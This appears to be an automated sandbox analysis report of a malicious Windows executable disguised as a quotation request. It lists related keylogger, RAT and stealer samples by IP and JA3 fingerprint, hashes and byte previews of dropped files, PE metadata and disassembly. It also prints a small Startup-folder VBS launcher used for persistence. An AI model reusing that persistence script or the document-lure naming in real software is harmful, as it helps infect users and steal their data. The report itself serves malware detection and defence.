	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	SWIFT09181-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	RdLfpZY5A9.exe	Get hash	malicious	77Rootkit, XWorm	Browse	149.154.167.220
	3edTbzftGf.exe	Get hash	malicious	Discord Token Stealer, DotStealer	Browse	149.154.167.220
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe	Get hash	malicious	GuLoader	Browse	158.101.44.242
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242
	arm5.elf	Get hash	malicious	Unknown	Browse	147.154.242.4
	SWIFT09181-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.130.0
	file.exe	Get hash	malicious	Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc	Browse	193.122.130.0
TELEGRAMRU	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	nB52P46OJD.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	149.154.167.99
	njrtdhadawt.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	T0x859fNfn.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
CLOUDFLARENETUS	https://simatantincendi.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://business.livechathelpsuite.com	Get hash	malicious	Unknown	Browse	172.67.163.209
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	KASHI SHIP PARTICULARS.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	172.67.177.134
	https://eu.onamoc.comano.us/XaFJNdmNsY0JUVzZrd09aZnpEZk9LNXJHSFV1RTlrbFdPMXQ5dzRKTHV4dEdpUEhTM1I1MCszdjdWWm54V01kSEhOSlpOSFpjMUlsaFNTc0l3eXhVeWl3TGVjWm14bGMxUFkzWWFkVUQvbUlNMGEza0pnOFFCK3N4TDBlc3RyYWJkSE9xVU9ETG5TU1lHQkZwdStVdXhGMzdoQzltdFAwRnc0WTJuMmF3Q1VkTzdMb0lwNXhqOFQ3eGRtK0ZuQUpydjMxSWdnPT0tLUFPWFdqaFhtRnVKaEhNK20tLUlJNFZwQjNETFQyTk1iL0UxMUxBTGc9PQ==?cid=300477933	Get hash	malicious	KnowBe4	Browse	104.17.249.203
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	nB52P46OJD.exe	Get hash	malicious	Vidar	Browse	172.64.41.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	104.21.67.152
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe	Get hash	malicious	GuLoader	Browse	104.21.67.152
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	SWIFT09181-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
3b5074b1b5d032e5620f69f9f700ff0e	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	#U00d6deme tavsiyesi.pdf.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	KASHI SHIP PARTICULARS.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	#U00d6deme tavsiyesi.pdf.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	ZppxPm0ASs.exe	Get hash	malicious	Xmrig	Browse	149.154.167.220
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1004544
Entropy (8bit):	6.84070086275949
Encrypted:	false
SSDEEP:	24576:Au6J33O0c+JY5UZ+XC0kGso6Fak6cYdM4G0EWY:qu0c++OCvkGs9FakBYe4bY
MD5:	29FA7717196E21C8A1F9C7C5B8883F77
SHA1:	863C0D428D4053E9026E43412CF4C8487A3301C4
SHA-256:	B1D0CB05942924FCAB68C6578FBBC11C6A6E16A9B91C180B99A67D291DE090F1
SHA-512:	3799A6E60D7070B9B39D47E92BDD593CAD11F758D597A274B8036A9D5D8DE4AD3E8FBEEEF973DAC4A9EC9180702403D39E05CD5D5EEE3A2376546AA9DBF5555D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L.....`g.........."..........r.......}............@.......................................@...@.......@.....................L...\|....p.......................@...q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc........p......................@..@.reloc...q...@...r..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut301F.tmp

Download File

Process:	C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe
File Type:	data
Category:	dropped
Size (bytes):	60406
Entropy (8bit):	7.778779127993442
Encrypted:	false
SSDEEP:	1536:gMgg8Lt9NO0awTVu8rxz3NYPG5HKvb1JUKkCYCe57qbetm+P1OcusE8:iDXNEwTZxz3OJH/Y37qbBUh
MD5:	6F0D7D21E8D8D9F57D58E319F8978E95
SHA1:	E8A16D55A2AC8352183F9E69B7E27DA676847557
SHA-256:	5AFB6AA9471D5BBBE77EF7699D6A005981280F5C3DB157B4BDC285C659ABEE74
SHA-512:	CBCF9E6EFA5E50E2BF8424E4B932BBBD5ECC7CFD09F7D25449C7C66C9A81B0C71018BC748A8798983CF4AD62F962B613ECA085C9C852C509BF07E790B9176F44
Malicious:	false
Reputation:	low
Preview:	EA06..n..[.U.E..0..T}g..8..kU.X.....sJ..r.!.(......&..z....l.../=....k.s,.....eZ...Y...1....../{.F.....N.. ....+U.=..0.Z%.`..j.t..:.........z.._B.G......l.@.L(. ..mY.O@$3A...T....Pb.4..g3ZUB.S..iTz.........v.....A.V..Y.......(. .P....@V..;M..#`......8..-..X.0..m[...=s.Vk.z<.E(..0up..(. L...-$........\..+.U.3...... ...b....D...........h..\.H.u....H.Q...L.>..+U.......i.._...6..@.14.T..Z....Tp...... .....$.....-. ..@.... .... I...X..d.{.>.C.F.u....Nc.I...H.qju.=^.{.Ng.....L..U.oNn.@Q...]'.4...K.....V...LJaF.S(59......T...KC.V....fu..V.....-E..UY.fG...\.P..x.M).".F..@M. ,.j.S.Wb@..L.A..)4z...8...@..7E.^'4i.fy....SZ...y.[n4.t.s1..,4[.J. .R.tJ.^.5.U.~ZD.z.Q.s.J.5.W......Z..bW=..;..R..N.Z... .....&.[.<..7(...N.[`u.=Vis.Niv....d... ".~.F.MkUM..a0..%>.......@._.aE.V......9...8}"aC.\.U9.~q........E.W(..efq?..@....@.\.......L(..=....Oi.....f..$6...!]..-....R.Q.2..B...Xm..(......;]j...V.P...]v..&..l".H.[.....CL.Nf......`T$.@...l..)5Y......eu-..kZ..}...r..

C:\Users\user\AppData\Local\Temp\aut338A.tmp

Download File

Process:	C:\Users\user\AppData\Local\Allene\nonplacental.exe
File Type:	data
Category:	dropped
Size (bytes):	60406
Entropy (8bit):	7.778779127993442
Encrypted:	false
SSDEEP:	1536:gMgg8Lt9NO0awTVu8rxz3NYPG5HKvb1JUKkCYCe57qbetm+P1OcusE8:iDXNEwTZxz3OJH/Y37qbBUh
MD5:	6F0D7D21E8D8D9F57D58E319F8978E95
SHA1:	E8A16D55A2AC8352183F9E69B7E27DA676847557
SHA-256:	5AFB6AA9471D5BBBE77EF7699D6A005981280F5C3DB157B4BDC285C659ABEE74
SHA-512:	CBCF9E6EFA5E50E2BF8424E4B932BBBD5ECC7CFD09F7D25449C7C66C9A81B0C71018BC748A8798983CF4AD62F962B613ECA085C9C852C509BF07E790B9176F44
Malicious:	false
Reputation:	low
Preview:	EA06..n..[.U.E..0..T}g..8..kU.X.....sJ..r.!.(......&..z....l.../=....k.s,.....eZ...Y...1....../{.F.....N.. ....+U.=..0.Z%.`..j.t..:.........z.._B.G......l.@.L(. ..mY.O@$3A...T....Pb.4..g3ZUB.S..iTz.........v.....A.V..Y.......(. .P....@V..;M..#`......8..-..X.0..m[...=s.Vk.z<.E(..0up..(. L...-$........\..+.U.3...... ...b....D...........h..\.H.u....H.Q...L.>..+U.......i.._...6..@.14.T..Z....Tp...... .....$.....-. ..@.... .... I...X..d.{.>.C.F.u....Nc.I...H.qju.=^.{.Ng.....L..U.oNn.@Q...]'.4...K.....V...LJaF.S(59......T...KC.V....fu..V.....-E..UY.fG...\.P..x.M).".F..@M. ,.j.S.Wb@..L.A..)4z...8...@..7E.^'4i.fy....SZ...y.[n4.t.s1..,4[.J. .R.tJ.^.5.U.~ZD.z.Q.s.J.5.W......Z..bW=..;..R..N.Z... .....&.[.<..7(...N.[`u.=Vis.Niv....d... ".~.F.MkUM..a0..%>.......@._.aE.V......9...8}"aC.\.U9.~q........E.W(..efq?..@....@.\.......L(..=....Oi.....f..$6...!]..-....R.Q.2..B...Xm..(......;]j...V.P...]v..&..l".H.[.....CL.Nf......`T$.@...l..)5Y......eu-..kZ..}...r..

C:\Users\user\AppData\Local\Temp\aut670E.tmp

Download File

Process:	C:\Users\user\AppData\Local\Allene\nonplacental.exe
File Type:	data
Category:	dropped
Size (bytes):	60406
Entropy (8bit):	7.778779127993442
Encrypted:	false
SSDEEP:	1536:gMgg8Lt9NO0awTVu8rxz3NYPG5HKvb1JUKkCYCe57qbetm+P1OcusE8:iDXNEwTZxz3OJH/Y37qbBUh
MD5:	6F0D7D21E8D8D9F57D58E319F8978E95
SHA1:	E8A16D55A2AC8352183F9E69B7E27DA676847557
SHA-256:	5AFB6AA9471D5BBBE77EF7699D6A005981280F5C3DB157B4BDC285C659ABEE74
SHA-512:	CBCF9E6EFA5E50E2BF8424E4B932BBBD5ECC7CFD09F7D25449C7C66C9A81B0C71018BC748A8798983CF4AD62F962B613ECA085C9C852C509BF07E790B9176F44
Malicious:	false
Reputation:	low
Preview:	EA06..n..[.U.E..0..T}g..8..kU.X.....sJ..r.!.(......&..z....l.../=....k.s,.....eZ...Y...1....../{.F.....N.. ....+U.=..0.Z%.`..j.t..:.........z.._B.G......l.@.L(. ..mY.O@$3A...T....Pb.4..g3ZUB.S..iTz.........v.....A.V..Y.......(. .P....@V..;M..#`......8..-..X.0..m[...=s.Vk.z<.E(..0up..(. L...-$........\..+.U.3...... ...b....D...........h..\.H.u....H.Q...L.>..+U.......i.._...6..@.14.T..Z....Tp...... .....$.....-. ..@.... .... I...X..d.{.>.C.F.u....Nc.I...H.qju.=^.{.Ng.....L..U.oNn.@Q...]'.4...K.....V...LJaF.S(59......T...KC.V....fu..V.....-E..UY.fG...\.P..x.M).".F..@M. ,.j.S.Wb@..L.A..)4z...8...@..7E.^'4i.fy....SZ...y.[n4.t.s1..,4[.J. .R.tJ.^.5.U.~ZD.z.Q.s.J.5.W......Z..bW=..;..R..N.Z... .....&.[.<..7(...N.[`u.=Vis.Niv....d... ".~.F.MkUM..a0..%>.......@._.aE.V......9...8}"aC.\.U9.~q........E.W(..efq?..@....@.\.......L(..=....Oi.....f..$6...!]..-....R.Q.2..B...Xm..(......;]j...V.P...]v..&..l".H.[.....CL.Nf......`T$.@...l..)5Y......eu-..kZ..}...r..

C:\Users\user\AppData\Local\Temp\tapestring

Download File

Process:	C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe
File Type:	data
Category:	dropped
Size (bytes):	93696
Entropy (8bit):	6.854370785254422
Encrypted:	false
SSDEEP:	1536:h/NMNQL00fnvskq2hI6dKOMRMWBY8VqrHs/zF2VxIrXOXCodQqW:h79h4OpD22s7F2Vxe+XCoij
MD5:	6E14D87A5C1D01F1642E9AC54CD166CA
SHA1:	D37378A62F9E0E5E9411443596EBDEAF315BBBC7
SHA-256:	D801AE31C16BD7FDC4ED54D593A3898E3A9666995995D15B3A9269C06AA390C6
SHA-512:	EEFC3E280EFDE50EA04A40990AA2254E084EADEA03F300B7A0442E51F9428257DD3CC7B29E40683F01DA205257467840947CCDB1906776D59BD332E01AF94026
Malicious:	false
Reputation:	low
Preview:	to.PHCH0ARZG..Y8.5ZPKCH0.RZGS4Y895ZPKCH0ERZGS4Y895ZPKCH0ERZG.4Y87.^K.A.d.[....PPFz 9,/B$?z$2Z7WM.85k1=^e;4g.{..TZ>5eNE:aRZGS4Y8ipZP.BK0.h/.S4Y895ZP.CJ1NS.GSPX89=ZPKCH0K.[GS.Y89.[PKC.0ErZGS6Y8=5ZPKCH0ARZGS4Y89.[PKAH0ERZGQ4..95JPKSH0ERJGS$Y895ZP[CH0ERZGS4Y8..[P.CH0E.[G.1Y895ZPKCH0ERZGS4Y89.[PGCH0ERZGS4Y895ZPKCH0ERZGS4Y895ZPKCH0ERZGS4Y895ZPKCH0ErZG[4Y895ZPKCH0MrZG.4Y895ZPKCH0k&??'4Y8-W[PKcH0E6[GS6Y895ZPKCH0ERZGs4YX.G)"(CH0.WZGS.X893ZPK%I0ERZGS4Y895ZP.CHpk ?+<WY855ZPK.I0EPZGSXX895ZPKCH0ERZG.4Yz95ZPKCH0ERZGS4Y8.[PKCH0.RZGQ4\8!.ZP..H0FRZG.4Y>Y.ZP.CH0ERZGS4Y895ZPKCH0ERZGS4Y895ZPKCH0ERZGS4Y8.H._..Y6..GS4Y894XSOE@8ERZGS4Y8G5ZP.CH0.RZGd4Y8.5ZP&CH0aRZG-4Y8G5ZP/CH07RZG24Y8~5ZP$CH0+RZG-4Y8'7rOKCB.cRXos4Y29..#jCH:.SZGWG{89?.RKCLCfRZM.7Y8=F~PKI.4ER^4v4Y2.0ZPOi.0F.LAS4BW.5ZZK@.%CRZ\y.Y:..ZPACb.EQ.RU4Y#..ZR.JH0Ax.4N4Y>.wZPA7A0EP.MS4].'7r.KCB.g,IGS0r8..$DKCL.Exx9F4Y<.5pr5UH0AyZmqJN891qPaEbRE .KSDZWX5ZVc.H0Oz.GS2Y..5$^KCL2.ZGY.s.9..PKEH..RZAS..893Zx.CH6Ez.GS2Y..5r.KCN0m.ZGU4s.9KiPKGd7;aZGW.OF.5ZT.E00

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs

Download File

Process:	C:\Users\user\AppData\Local\Allene\nonplacental.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	3.3641236737535967
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1klADNrQlTlupRdnriIM8lfQVn:DsO+vNlzQ1klAD5wT0tmA2n
MD5:	08DBE9B852E5825DBF3A78562ACFD5CC
SHA1:	D1B671C2D4802203BB0993802615E64A0A8EEFE1
SHA-256:	146414A8FB315A255EA182CD82873BFF0A9E8B1049ACCA2681E5F10ED30344EB
SHA-512:	C45707DAAC5695C89A1BD8D84764B824E7A86F9F7198C09ADAAC9AC3F90E955BA0EAA070132DEA83364CAABFB767CC820082520FAD675E6F3BF7D5144A9A099D
Malicious:	true
Reputation:	low
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.A.l.l.e.n.e.\.n.o.n.p.l.a.c.e.n.t.a.l...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.84070086275949
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	QUOTATION REQUEST - BQS058.exe
File size:	1'004'544 bytes
MD5:	29fa7717196e21c8a1f9c7c5b8883f77
SHA1:	863c0d428d4053e9026e43412cf4c8487a3301c4
SHA256:	b1d0cb05942924fcab68c6578fbbc11c6a6e16a9b91c180b99a67d291de090f1
SHA512:	3799a6e60d7070b9b39d47e92bdd593cad11f758d597a274b8036a9d5d8de4ad3e8fbeeef973dac4a9ec9180702403d39e05cd5d5eee3a2376546aa9dbf5555d
SSDEEP:	24576:Au6J33O0c+JY5UZ+XC0kGso6Fak6cYdM4G0EWY:qu0c++OCvkGs9FakBYe4bY
TLSH:	4D259C2373DD836CCB669173BE3963206E6B7E630630B8573EC84D7DA960161162D6E3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	24ed8d96b2ade832

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67601985 [Mon Dec 16 12:13:57 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FEC64E0F4CAh
jmp 00007FEC64E02294h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FEC64E0241Ah
cmp edi, eax
jc 00007FEC64E0277Eh
bt dword ptr [004C31FCh], 01h
jnc 00007FEC64E02419h
rep movsb
jmp 00007FEC64E0272Ch
cmp ecx, 00000080h
jc 00007FEC64E025E4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FEC64E02420h
bt dword ptr [004BE324h], 01h
jc 00007FEC64E028F0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007FEC64E025BDh
test edi, 00000003h
jne 00007FEC64E025CEh
test esi, 00000003h
jne 00007FEC64E025ADh
bt edi, 02h
jnc 00007FEC64E0241Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FEC64E02423h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FEC64E02475h
bt esi, 03h
jnc 00007FEC64E024C8h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x2ca9c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf4000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x2ca9c	0x2cc00	d9e3bd0b73e5d4b967b6e308de61394d	False	0.6848594622905028	data	7.1759745041187735	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xf4000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc7458	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc7580	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc76a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc77d0	0xd228	Device independent bitmap graphic, 101 x 256 x 32, image size 51712, resolution 9055 x 9055 px/m	English	Great Britain	0.07864312267657993
RT_MENU	0xd49f8	0x50	data	English	Great Britain	0.9
RT_STRING	0xd4a48	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xd4fdc	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xd5668	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xd5af8	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xd60f4	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xd6750	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xd6bb8	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xd6d10	0x1c86f	data			1.000393677201811
RT_GROUP_ICON	0xf3580	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xf3594	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xf35a8	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xf35bc	0x14	data	English	Great Britain	1.25
RT_VERSION	0xf35d0	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0xf36ac	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
